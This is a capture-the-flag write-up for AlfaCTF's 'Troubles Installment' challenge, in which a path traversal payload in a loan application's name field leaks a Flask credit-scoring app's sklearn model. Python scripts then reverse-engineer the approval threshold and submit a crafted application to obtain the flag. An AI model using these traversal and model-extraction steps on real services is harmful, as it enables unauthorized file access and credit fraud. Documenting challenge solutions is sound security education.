Troubles Installment

alfactf

Task: Flask credit scoring app with ML-based loan approval; ULTRA-LOW-RISK product reveals flag but requires ML model approval. Solution: path traversal in document download to extract sklearn model, reverse engineer threshold and special categorical values, craft application that passes ML scoring.

flask lfi path_traversal postgresql machine_learning sklearn random_forest credit_scoring reportlab joblib

path_traversal_via_db_field ml_model_extraction sklearn_model_reverse_engineering feature_bruteforce threshold_bypass


Troubles Installment — AlfaCTF

Description

"Karabin Capital" is a credit scoring web application where users submit loan applications. The goal is to get a loan approved under the "ULTRA-LOW-RISK" product, which reveals the flag.

The application is a Flask web service with PostgreSQL backend. Users register, submit loan applications with personal and financial data, and receive approval decisions. Applications with amount <= 10000 are auto-approved as MICRO-CASH. Larger amounts go through an ML scoring model (sklearn RandomForestClassifier). The ULTRA-LOW-RISK product requires amount >= 500000 AND ML model approval (probability >= threshold), and reveals the flag upon approval.

Analysis

Application Architecture

Flask web application with PostgreSQL database
ReportLab for PDF document generation
sklearn RandomForestClassifier for credit scoring
Two-tier approval logic:
- amount <= 10000: auto-approved as MICRO-CASH
- amount > 10000: requires ML model scoring
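The two-tier logic can be sketched as a small decision function. This is an illustration built only from the rules stated in this write-up, not the application's actual code: the function name, the "rejected" status string, and the `None` product for mid-range amounts are assumptions, since the source does not say what happens there.

```python
from typing import Optional, Tuple

MICRO_CASH_LIMIT = 10_000      # amounts up to this are auto-approved (from the write-up)
ULTRA_LOW_RISK_MIN = 500_000   # minimum amount for ULTRA-LOW-RISK (from the write-up)


def decide(amount: int, probability: float, threshold: float) -> Tuple[str, Optional[str]]:
    """Return (status, product_code) for an application (hypothetical helper)."""
    if amount <= MICRO_CASH_LIMIT:
        # Small loans never reach the ML model
        return "approved", "MICRO-CASH"
    if probability < threshold:
        # Assumed status string; the write-up only shows "approved"
        return "rejected", None
    if amount >= ULTRA_LOW_RISK_MIN:
        return "approved", "ULTRA-LOW-RISK"
    # The write-up does not name the product for this range
    return "approved", None


print(decide(5_000, 0.0, 0.93))
print(decide(1_000_000, 0.9915, 0.93))
```

The first branch is what makes Step 1 possible: an auto-approved small loan yields a downloadable document without the model having to agree.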

Vulnerability Discovery

The vulnerability is in the download_document function (app.py lines 820-864):

@app.get("/api/applications/<application_id>/document")
def download_document(application_id: str) -> Response:
    ...
    base_dir = STORAGE_ROOT / user["public_uuid"] / user["login"]
    unsafe_path = base_dir / row["name"]  # row["name"] = application_name from DB
    safe_path = safe_document_path(user, row["name"])
    ...
    target_path = unsafe_path if unsafe_path.exists() else safe_path
    file_bytes = target_path.read_bytes()  # Reads arbitrary file!

The application_name field from the database is used directly in file path construction without sanitization. When creating an application, the user controls the application_name field, which gets stored in the database and later used to construct the file path for document download.
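The fallback logic can be reproduced locally in a temporary directory. The sketch below is a stand-in for the handler, not the application's code: `pick_target`, the directory names, and the file contents are made up for illustration. On Linux each `..` is resolved through real directories, so the sketch creates the user's base directory before probing the path.

```python
import tempfile
from pathlib import Path


def pick_target(base_dir: Path, name: str, safe_path: Path) -> Path:
    """Mimic the handler: prefer the unsanitized path whenever it exists."""
    unsafe_path = base_dir / name
    return unsafe_path if unsafe_path.exists() else safe_path


with tempfile.TemporaryDirectory() as tmp:
    root = Path(tmp)
    # Hypothetical layout mirroring storage/{uuid}/{login}
    base_dir = root / "data" / "storage" / "some-uuid" / "attacker01"
    base_dir.mkdir(parents=True)
    secret = root / "secrets" / "karabin-ratebook"
    secret.parent.mkdir()
    secret.write_bytes(b"model-bytes")  # placeholder content

    safe_path = base_dir / "document.pdf"
    target = pick_target(base_dir, "../../../../secrets/karabin-ratebook", safe_path)
    leaked = target.read_bytes()
    # A containment check of this kind would have caught the escape
    escaped = not target.resolve().is_relative_to(base_dir.resolve())

print(leaked, escaped)
```

Because the traversal path exists, it wins over `safe_path`, and the read returns the file outside the user's directory. `Path.is_relative_to` requires Python 3.9 or later.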

Path Traversal Calculation

Base path: /srv/karabin/data/storage/{uuid}/{login}/
Target file: /srv/karabin/secrets/karabin-ratebook (the ML model)
Traversal payload: ../../../../secrets/karabin-ratebook
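The number of `../` segments can be checked offline with `posixpath`. The UUID and login below are placeholders; only the directory depth matters.

```python
import posixpath

# Placeholder uuid/login; the real values differ per user
base = "/srv/karabin/data/storage/some-uuid/attacker01"
target = "/srv/karabin/secrets/karabin-ratebook"

# Derive the relative payload from the two absolute paths
payload = posixpath.relpath(target, base)
# Confirm that joining the payload onto the base lands on the target
resolved = posixpath.normpath(posixpath.join(base, payload))

print(payload)
print(resolved)
```

Four levels are needed: two to leave `{uuid}/{login}`, one for `storage`, and one for `data`.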

Solution

Step 1: Extract the ML Model via Path Traversal

import requests

BASE_URL = 'https://capital-xxx.alfactf.ru'
session = requests.Session()

# Register a new user
session.post(f'{BASE_URL}/api/register', json={
    'login': 'attacker01',
    'password': 'password123'
})

# Create an application with path traversal in the name
# Amount <= 10000 ensures auto-approval (needed to get document_url)
application_data = {
    'application_name': '../../../../secrets/karabin-ratebook',
    'birth_date': '1990-01-01',
    'last_name': 'Test',
    'first_name': 'Test',
    'patronymic': 'Test',
    'annual_income': 100000,
    'monthly_expenses': 5000,
    'amount': 5000,  # <= 10000 for auto-approve
    'term_months': 12,
    'karabin_payroll_project': '0',
    'housing_type': 'Rented apartment',
    'occupation_type': 'IT staff',
    'education_type': 'Higher education',
    'family_status': 'Single / not married'
}

response = session.post(f'{BASE_URL}/api/applications', json=application_data)
app_id = response.json()['application']['id']

# Download the "document" - actually retrieves the ML model!
response = session.get(f'{BASE_URL}/api/applications/{app_id}/document')
# Content-Type will be application/octet-stream (not PDF)

with open('karabin-ratebook', 'wb') as f:
    f.write(response.content)
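A quick way to confirm that the traversal worked, rather than the server falling back to the generated PDF, is to check the file signature. The helper below is a hypothetical addition; it relies only on the fact that PDF files begin with `%PDF-`. The sample byte strings are stand-ins, not data from the challenge.

```python
def looks_like_pdf(data: bytes) -> bool:
    """Return True if the payload starts with the PDF file signature."""
    return data.startswith(b"%PDF-")


# Stand-in samples for illustration
pdf_sample = b"%PDF-1.4\n..."
other_sample = b"\x80\x04\x95"

print(looks_like_pdf(pdf_sample))
print(looks_like_pdf(other_sample))
```

In the script above this would be called as `looks_like_pdf(response.content)`; a `False` result suggests the response is the target file rather than a generated document.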

Step 2: Analyze the ML Model

import joblib
import pandas as pd

# Load the extracted model bundle
bundle = joblib.load('karabin-ratebook')
print(bundle.keys())  # ['pipeline', 'threshold', 'features']

# Critical finding: approval threshold
print(f"Threshold: {bundle['threshold']}")  # 0.93

pipeline = bundle['pipeline']
# Pipeline structure: ColumnTransformer (preprocessor) + RandomForestClassifier

# Extract categorical feature encodings
preprocessor = pipeline.steps[0][1]
cat_encoder = preprocessor.named_transformers_['categorical']

# Discovered CTF-specific categories hidden in the model:
# LAST_NAME categories include: 'Цтфный' (CTF hint!)
# FIRST_NAME categories include: 'Лев'
# PATRONYMIC categories include: 'Альфабанкович' (CTF hint!)

Key findings from model analysis:

Threshold = 0.93: Need probability >= 0.93 for ULTRA-LOW-RISK approval
CTF-specific names: The model was trained with special categorical values that give high approval probability:
- Last name: "Цтфный" (literally "CTF-like")
- First name: "Лев"
- Patronymic: "Альфабанкович" (contains "Alfa" - the CTF organizer)
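Listing the categories the encoder was fitted on is what surfaces these names. The helper below is a sketch, not the code used in the original analysis: it assumes the categorical transformer is either a fitted encoder exposing `categories_` (as scikit-learn's `OneHotEncoder` and `OrdinalEncoder` do) or a `Pipeline` whose `steps` contain one. The demo uses a stand-in object so that it runs without the model file.

```python
from types import SimpleNamespace


def collect_categories(transformer, feature_names):
    """Map each feature name to the categories a fitted encoder has seen."""
    # Look at the transformer itself, then at its pipeline steps, if any
    candidates = [transformer]
    candidates += [step for _, step in getattr(transformer, "steps", [])]
    for candidate in candidates:
        categories = getattr(candidate, "categories_", None)
        if categories is not None:
            return {name: list(values) for name, values in zip(feature_names, categories)}
    raise ValueError("no fitted encoder with categories_ found")


# Stand-in for a fitted encoder; the values are illustrative only
fake_encoder = SimpleNamespace(categories_=[["Иванов", "Цтфный"], ["Лев"]])
fake_pipeline = SimpleNamespace(steps=[("encode", fake_encoder)])

found = collect_categories(fake_pipeline, ["LAST_NAME", "FIRST_NAME"])
print(found)
```

Against the real bundle this would be called as `collect_categories(cat_encoder, columns)`, where `columns` is the column list of the categorical entry in `preprocessor.transformers_`. Unusual values among otherwise ordinary names are the ones worth testing first.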

Step 3: Find Winning Parameters

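A brute-force search over the feature values finds a combination that reaches probability >= 0.93. The profile below is one such combination, scored with the pipeline loaded in Step 2:

import pandas as pd

# Score the CTF-specific profile (pipeline comes from Step 2)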
profile = {
    'LAST_NAME': 'Цтфный',
    'FIRST_NAME': 'Лев',
    'PATRONYMIC': 'Альфабанкович',
    'AGE_YEARS': 35,
    'AMT_INCOME_TOTAL': 5000000,
    'REQUESTED_AMOUNT': 1000000,
    'REQUESTED_TERM_MONTHS': 36,
    'MONTHLY_EXPENSES': 100000,
    'KARABIN_PAYROLL_PROJECT': 1,
    'NAME_HOUSING_TYPE': 'Office apartment',
    'OCCUPATION_TYPE': 'High skill tech staff',
    'NAME_EDUCATION_TYPE': 'Higher education',
    'NAME_FAMILY_STATUS': 'Married',
}

df = pd.DataFrame([profile])
proba = pipeline.predict_proba(df)[0][1]
print(f"Probability: {proba}")  # 0.9915 >= 0.93 ✓
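The search itself is not shown above; a minimal sketch of how such a brute force could look follows. It is not the original search code. `grid_search`, the grid, and `toy_score` are hypothetical, and `toy_score` is a deterministic stand-in for the model so that the example runs without the extracted file.

```python
from itertools import product


def grid_search(base_profile, grid, score_fn, threshold):
    """Try every combination in grid; stop at the first one reaching threshold."""
    keys = list(grid)
    best_profile, best_score = None, float("-inf")
    for values in product(*(grid[key] for key in keys)):
        candidate = {**base_profile, **dict(zip(keys, values))}
        score = score_fn(candidate)
        if score > best_score:
            best_profile, best_score = candidate, score
        if score >= threshold:
            break
    return best_profile, best_score


def toy_score(profile):
    """Stand-in scorer (NOT the real model): rewards two feature values."""
    score = 0.5
    score += 0.2 * (profile["KARABIN_PAYROLL_PROJECT"] == 1)
    score += 0.25 * (profile["NAME_FAMILY_STATUS"] == "Married")
    return score


base = {"LAST_NAME": "Цтфный", "FIRST_NAME": "Лев", "PATRONYMIC": "Альфабанкович"}
grid = {
    "KARABIN_PAYROLL_PROJECT": [0, 1],
    "NAME_FAMILY_STATUS": ["Single / not married", "Married"],
}

best_profile, best_score = grid_search(base, grid, toy_score, threshold=0.93)
print(best_profile, best_score)
```

With the real bundle, `score_fn` would be something like `lambda p: pipeline.predict_proba(pd.DataFrame([p]))[0][1]`, and `base` would need every feature column the pipeline expects. Fixing the three name fields first keeps the grid small.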

Step 4: Submit Winning Application

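from datetime import date

# AGE_YEARS in the model is presumably derived from birth_date;
# 1991-01-15 gives an age of about 35, depending on the submission date
birth_date = date(1991, 1, 15)

winning_application = {
    'application_name': 'ULTRA_LOW_RISK_WIN',
    'birth_date': birth_date.isoformat(),  # '1991-01-15'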
    'last_name': 'Цтфный',
    'first_name': 'Лев',
    'patronymic': 'Альфабанкович',
    'annual_income': 5000000,
    'monthly_expenses': 100000,
    'amount': 1000000,  # >= 500000 for ULTRA-LOW-RISK
    'term_months': 36,
    'karabin_payroll_project': '1',
    'housing_type': 'Office apartment',
    'occupation_type': 'High skill tech staff',
    'education_type': 'Higher education',
    'family_status': 'Married'
}

response = session.post(f'{BASE_URL}/api/applications', json=winning_application)
data = response.json()['application']

print(f"Status: {data['status']}")           # approved
print(f"Product: {data['product_code']}")    # ULTRA-LOW-RISK
print(f"Flag: {data['flag']}")               # alfa{b4NK_CreDIt_ScoR3_was_5Tol3N_4ND_lo4n_w45_r3cEIV3d}
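The birth date in Step 4 is hard-coded, so the resulting age depends on when the application is submitted. The sketch below derives a birth date for a target age instead. It assumes the server computes age in completed years from `birth_date`, which the write-up does not confirm; both helper names are hypothetical.

```python
from datetime import date


def age_on(birth: date, today: date) -> int:
    """Completed years between birth and today."""
    years = today.year - birth.year
    # Subtract one if this year's birthday has not happened yet
    if (today.month, today.day) < (birth.month, birth.day):
        years -= 1
    return years


def birth_date_for_age(age: int, today: date) -> date:
    """Latest birth date that yields the given age on `today`."""
    try:
        return today.replace(year=today.year - age)
    except ValueError:
        # Feb 29 mapped onto a non-leap year
        return today.replace(year=today.year - age, day=28)


example_day = date(2025, 9, 1)  # arbitrary example date
print(age_on(date(1991, 1, 15), example_day))
print(birth_date_for_age(35, example_day).isoformat())
```

If the model is sensitive to `AGE_YEARS`, passing `birth_date_for_age(35, date.today()).isoformat()` as `birth_date` keeps the submitted age aligned with the value used during offline scoring.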